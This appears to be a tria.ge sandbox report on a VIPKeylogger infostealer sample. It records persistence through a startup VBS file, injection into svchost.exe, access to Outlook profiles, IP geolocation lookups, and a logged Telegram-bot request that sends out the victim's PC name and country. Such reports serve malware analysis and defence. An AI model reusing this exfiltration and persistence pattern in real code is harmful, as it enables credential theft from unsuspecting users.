Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
106s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10/01/2025, 14:09 UTC
Behavioral task
behavioral1
Sample
3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
Resource
win10v2004-20241007-en
General
-
Target
3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
-
Size
634KB
-
MD5
80a64f0b8df55d637e135f0eb4fb6b70
-
SHA1
f491fc184d0f15d789e81577e47446478c10ed53
-
SHA256
3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8
-
SHA512
f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432
-
SSDEEP
12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiaqooGCQemOT6I0FGk9x:Zq5TfcdHj4fmbGG53OF0Nx
Malware Config
Extracted
vipkeylogger
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs demonetised.exe -
Executes dropped EXE 1 IoCs
pid Process 3724 demonetised.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org 16 reallyfreegeoip.org 17 reallyfreegeoip.org -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/1264-13-0x0000000000640000-0x00000000007AF000-memory.dmp autoit_exe behavioral2/memory/3724-33-0x00000000004D0000-0x000000000063F000-memory.dmp autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3724 set thread context of 1500 3724 demonetised.exe 84 -
resource yara_rule behavioral2/memory/1264-0-0x0000000000640000-0x00000000007AF000-memory.dmp upx behavioral2/files/0x0007000000023c9c-10.dat upx behavioral2/memory/3724-14-0x00000000004D0000-0x000000000063F000-memory.dmp upx behavioral2/memory/1264-13-0x0000000000640000-0x00000000007AF000-memory.dmp upx behavioral2/memory/3724-33-0x00000000004D0000-0x000000000063F000-memory.dmp upx -
Program crash 1 IoCs
pid pid_target Process procid_target 2276 3724 WerFault.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language demonetised.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1500 svchost.exe 1500 svchost.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3724 demonetised.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1500 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1264 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe 1264 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe 3724 demonetised.exe 3724 demonetised.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1264 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe 1264 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe 3724 demonetised.exe 3724 demonetised.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1264 wrote to memory of 3724 1264 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe 83 PID 1264 wrote to memory of 3724 1264 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe 83 PID 1264 wrote to memory of 3724 1264 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe 83 PID 3724 wrote to memory of 1500 3724 demonetised.exe 84 PID 3724 wrote to memory of 1500 3724 demonetised.exe 84 PID 3724 wrote to memory of 1500 3724 demonetised.exe 84 PID 3724 wrote to memory of 1500 3724 demonetised.exe 84 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Users\Admin\AppData\Local\inhumate\demonetised.exe"C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"3⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 7323⤵
- Program crash
PID:2276
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3724 -ip 37241⤵PID:4760
Network
-
Remote address:8.8.8.8:53Request133.211.185.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request64.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestcheckip.dyndns.orgIN AResponsecheckip.dyndns.orgIN CNAMEcheckip.dyndns.comcheckip.dyndns.comIN A132.226.8.169checkip.dyndns.comIN A193.122.6.168checkip.dyndns.comIN A132.226.247.73checkip.dyndns.comIN A158.101.44.242checkip.dyndns.comIN A193.122.130.0
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:132.226.8.169:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
Remote address:8.8.8.8:53Requestreallyfreegeoip.orgIN AResponsereallyfreegeoip.orgIN A104.21.112.1reallyfreegeoip.orgIN A104.21.32.1reallyfreegeoip.orgIN A104.21.64.1reallyfreegeoip.orgIN A104.21.96.1reallyfreegeoip.orgIN A104.21.80.1reallyfreegeoip.orgIN A104.21.16.1reallyfreegeoip.orgIN A104.21.48.1
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005620
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xmql4eDt0UjHAS%2Fd%2FJNg%2Bcl9WFHOJezCToQ3QOlJcud4WVg06xARq3pmfpme2PRwnNZUsyp5eF7NCYMgpsmQDd3NuNTCzkeN3gnxNQaXYyr%2Fv%2B3Fhcfu9HnLts%2B4h6xZ2G3H5kCw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eaa3e616535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=29594&min_rtt=26499&rtt_var=11354&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3009&recv_bytes=390&delivery_rate=134993&cwnd=253&unsent_bytes=0&cid=0a49e2d9766b0697&ts=100&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005620
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jXQrgq0%2B9%2BwWWLpglyEy9oCQ3SEgjnRNnrEyy6XRxIlSQ9CIdWLxibEwWiCqOMbhkQYV%2FJBlz9%2FvwlzISfkqYTnGPWaD%2BpvqvYO8DhRj1q87BFVzWRR%2BZ0HmD57Zt1rb8toYUp5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eac38946535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=35532&min_rtt=26499&rtt_var=20390&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4285&recv_bytes=482&delivery_rate=134993&cwnd=254&unsent_bytes=0&cid=0a49e2d9766b0697&ts=417&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005620
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DD6jpCQGRdDkdH%2FXt%2Bk2vJ1%2FQIz5%2BAq01qeva1elusGj1tUy5ZacZS19EV0yUSJzMHfJWp3ZggyDhRC9f7W%2FlAGmvm1x2uXnIofGBbSjwUyaKJ2HuyJ%2FTmv9BxDaV6fzsPcmXPFY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eae2adf6535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=40190&min_rtt=26499&rtt_var=24609&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5561&recv_bytes=574&delivery_rate=134993&cwnd=255&unsent_bytes=0&cid=0a49e2d9766b0697&ts=731&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005621
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkaxaa88JcVy4GwOGEsDf8DXnH6cEPt55nLgZ8qiGFgxS22l7GClfDGAWgRYs6d%2FcYacmYxBcwtskJfXZN5xc%2FVp0cQHBAcG4JE5JC3UzmbYV7ZQse2cvD21DV223PypPKJ0TzQs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eb02d3f6535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=44132&min_rtt=26499&rtt_var=26341&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6838&recv_bytes=666&delivery_rate=134993&cwnd=256&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1038&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005621
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBUXWbBxMK06GGHl1qY6VIRCstIvlGIRXlnO%2Frqtr%2Bm2lFEMm9Xh%2B%2BPook%2FrddxTRktE4UlsbAeN8SomnX7jq6Phetl3Nqm5dGFcn5thK5Bt%2Fotl3kf%2Fm3nPw5Kf8Dn5Tyo0cEDB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eb21fbb6535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48230&min_rtt=26499&rtt_var=27951&sent=9&recv=14&lost=0&retrans=0&sent_bytes=8108&recv_bytes=758&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1358&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005621
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=houIjoiAgglyLyOKmEx%2FngSfQOroRZr68erIwrSWPpvY8Cc7nPIe%2BSOWkdhhaJDptIv5hMyMznSv0vSE4dkbWVZeImHYRMj1sj3z4xXaYNQ5NMCktzLZJpYvWlwm4m9ND4iVAcgv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eb43ab06535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50828&min_rtt=26499&rtt_var=26159&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9388&recv_bytes=850&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1692&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005622
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sG8Dr5L%2FkW34t57BiPLEPBEF%2BZfYuV6nMlF8NjMwsK7rsiKW1zeM8JP48R4FIae93DkOzMhDYfg9zshE%2FFopkU%2Fa%2BGTkoSXgipjC565b4xMMt9hojTfrx7CChVfXZrlnKd40kcpV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eb63d566535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54365&min_rtt=26499&rtt_var=26694&sent=11&recv=18&lost=0&retrans=0&sent_bytes=10659&recv_bytes=942&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2014&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005622
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i5tDYMR%2F%2FB5VxijW9L9MbBtpYIp186Eknhh85ynLO%2BexHENfaN4DkXJ%2FQAShWaVw0PBUip9OQ7F2JqZvtZOH5AMbXh1ae1U3e0yW0OLh1jUKswPKwM968JQT6wWOenkcZ0MytuKz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eb828086535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=56265&min_rtt=26499&rtt_var=23820&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11937&recv_bytes=1034&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2325&x=0"
-
Remote address:104.21.112.1:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5005622
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXb0D9amDkAinM9ToP3pnIMedRA2l0CFwXLlL8nN6vmalADfbJXUleBRd%2F80C6RqRaNWP%2BFZdlpKJmbhPYK0s8bBHu5fKEhTDN70T0e%2B6KgeK3ZM3GKEDCig0j2VOsFWvjk3eSgV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd3eba2a526535-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=58168&min_rtt=26499&rtt_var=21672&sent=13&recv=22&lost=0&retrans=0&sent_bytes=13214&recv_bytes=1126&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2641&x=0"
-
Remote address:8.8.8.8:53Request169.8.226.132.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.112.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
GEThttps://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dsvchost.exeRemote address:149.154.167.220:443RequestGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 14:09:28 GMT
Content-Type: application/json
Content-Length: 55
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address:8.8.8.8:53Request220.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.187.3.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request217.135.221.88.in-addr.arpaIN PTRResponse217.135.221.88.in-addr.arpaIN PTRa88-221-135-217deploystaticakamaitechnologiescom
-
2.2kB 3.4kB 21 15
HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200 -
2.2kB 15.1kB 25 16
HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dtls, httpsvchost.exe1.2kB 6.7kB 12 11
HTTP Request
GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5DHTTP Response
404
-
73 B 147 B 1 1
DNS Request
133.211.185.52.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
64.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
64 B 176 B 1 1
DNS Request
checkip.dyndns.org
DNS Response
132.226.8.169193.122.6.168132.226.247.73158.101.44.242193.122.130.0
-
65 B 177 B 1 1
DNS Request
reallyfreegeoip.org
DNS Response
104.21.112.1104.21.32.1104.21.64.1104.21.96.1104.21.80.1104.21.16.1104.21.48.1
-
72 B 157 B 1 1
DNS Request
169.8.226.132.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
1.112.21.104.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
-
74 B 167 B 1 1
DNS Request
220.167.154.149.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
198.187.3.20.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
217.135.221.88.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
634KB
MD580a64f0b8df55d637e135f0eb4fb6b70
SHA1f491fc184d0f15d789e81577e47446478c10ed53
SHA2563fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8
SHA512f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432